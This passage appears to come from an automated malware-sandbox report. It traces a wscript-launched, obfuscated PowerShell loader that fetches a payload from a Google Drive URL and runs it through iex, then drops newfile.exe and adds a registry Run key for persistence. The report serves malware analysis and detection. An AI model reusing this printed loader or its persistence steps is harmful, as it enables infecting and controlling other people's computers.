HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: newfile.exe.9.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
Source: newfile.exe.9.dr Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B890972 push E85E465Dh; ret 1_2_00007FFD9B8909F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B963414 pushfd ; ret 1_2_00007FFD9B963415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B966FE4 pushad ; ret 1_2_00007FFD9B966FE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B967A4B push esi; ret 1_2_00007FFD9B967A4C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B967D14 push ebx; ret 1_2_00007FFD9B967D15
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_047C3405 push esp; retf 4_2_047C33E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_047C33D5 push esp; retf 4_2_047C33E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_073B08D8 push eax; mov dword ptr [esp], ecx 4_2_073B0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_073B0AB9 push eax; mov dword ptr [esp], ecx 4_2_073B0AC4
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_0062376D push ecx; ret 10_2_00623780
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_006213F8 pushfd ; retf 10_2_006213F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
